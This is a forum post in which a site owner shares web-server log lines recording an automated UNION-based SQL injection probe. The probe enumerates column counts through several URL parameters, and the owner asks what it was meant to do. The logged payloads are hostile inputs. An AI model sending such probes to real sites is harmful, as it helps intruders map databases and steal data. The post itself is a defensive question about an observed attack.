MySQL-Injection

evilduffp
Posts: 70
Joined: 2005-07-06 00:14

MySQL-Injection

Post by evilduffp »

Hello everyone,

First of all, I have protected my MySQL database against SQL injection attacks, e.g. with mysql_real_escape_string(), but I would still like to know what this attack (an excerpt from my log files) was actually meant to do. I don't quite understand what the attacker wanted. Spying out data, I think, or what in detail would have happened if this query had gone through?

Code:

XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:39 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2 HTTP/1.1" 404 1516 "-" "My   Session"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:39 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:39 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:39 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2 HTTP/1.1" 404 1516 "-" "My   Session"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1 HTTP/1.1" 404 1516 "-" "My   Session"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?upid=sp7&la=nl&s=0&ks=&zugang=1&id=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:40 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:41 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:41 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:41 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:41 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:41 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:41 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:41 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:41 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:42 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:42 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:42 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:42 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:42 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:42 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:42 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:43 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:43 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:43 +0000] "GET /mein_php_script.php?zugang=1&id=&upid=sp7&la=nl&s=0&ks=2%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:43 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:43 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:44 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:44 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:44 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:45 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:45 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
XXX.XXX.XXX.XXX - - [26/Aug/2010:23:05:46 +0000] "GET /mein_php_script.php?id=&upid=sp7&la=nl&s=0&ks=&zugang=1%20and%201=2%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1" 404 1516 "-" "czxt2s"
